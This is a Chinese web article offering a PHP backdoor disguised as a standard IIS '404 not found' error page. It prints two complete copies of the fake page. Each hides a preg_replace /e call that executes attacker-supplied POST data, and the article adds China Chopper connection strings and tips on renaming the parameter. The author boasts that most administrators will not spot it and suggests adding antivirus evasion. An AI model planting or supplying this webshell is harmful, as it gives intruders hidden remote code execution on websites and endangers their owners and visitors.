藏在404错误页面里的PHP一句话木马 - 安全工具 - 服务器之家

服务器之家

专注于服务器技术!
当前位置:首页 > 服务器安全 > 安全工具

藏在404错误页面里的PHP一句话木马

发布时间:2017-01-11 来源:服务器之家

我在网上看到很多404页面隐藏的后门,可是大部分都容易给站长发现后删除。

经过“asp大马官网”一手写的404错误页面php一句话木马,已经接近完美,百分之80的管理员也难发现。

这个404后门唯一不足的就是不免杀过狗,有动手能力的朋友,可以自己添加免杀后门代码,这样就可以达到软件查杀不出来,站长肉眼发现不了的效果。

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作:</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
</li>
<li>单击<a href="http://www.asp-muma.com/javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息(为技术支持人员提供)</p>
<ul>
<li>转到 <a >Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>
<li>打开&ldquo;IIS 帮助&rdquo;(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>
</TD></TR></TABLE>
<?php
@preg_replace("/[checksql]/e",$_POST['date'],"saft");
header('HTTP/1.1 404 Not Found');
?>
</BODY></HTML>
这里解释一下上面代码里面的['date']不是密码,而只是用来传参的参数。
这个一句话的密码并不在这段代码里面,而是在菜刀里面的配置语句里。

比如说配置代码为:<O>date=@eval($_POST[paxmac]);</O> 这里面的“paxmac”是可以随意更改的!改了这个地方后,就必须在密码框里也更改一下。我半夜实验这个一句话的时候就郁闷了,这样的话,这个一句话还谈何密码?不是任何人构造一个配置就可以连了?
错!在上面代码里面是可以改不是密码的密码部分,这个里面的POST['date']就是传参,在构造语句里也些明了,是data=一句话代码,所以你只需要修改上面代码里的date部分就可以了!

下面给出我个人改造后的代码和配置语句,这样这个一句话就是属于你自己独一无二的了!也就相当于密码了。

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作:</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
</li>
<li>单击<a href="http://www.asp-muma.com/javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息(为技术支持人员提供)</p>
<ul>
<li>转到 <a >Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>
<li>打开&ldquo;IIS 帮助&rdquo;(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>
</TD></TR></TABLE>
<?php
@preg_replace("/[checksql]/e",$_POST['cnsec'],"saft");
header('HTTP/1.1 404 Not Found');
?>
</BODY></HTML>
配置内代码写入: <O>cnsec=@eval($_POST[任意密码);</O>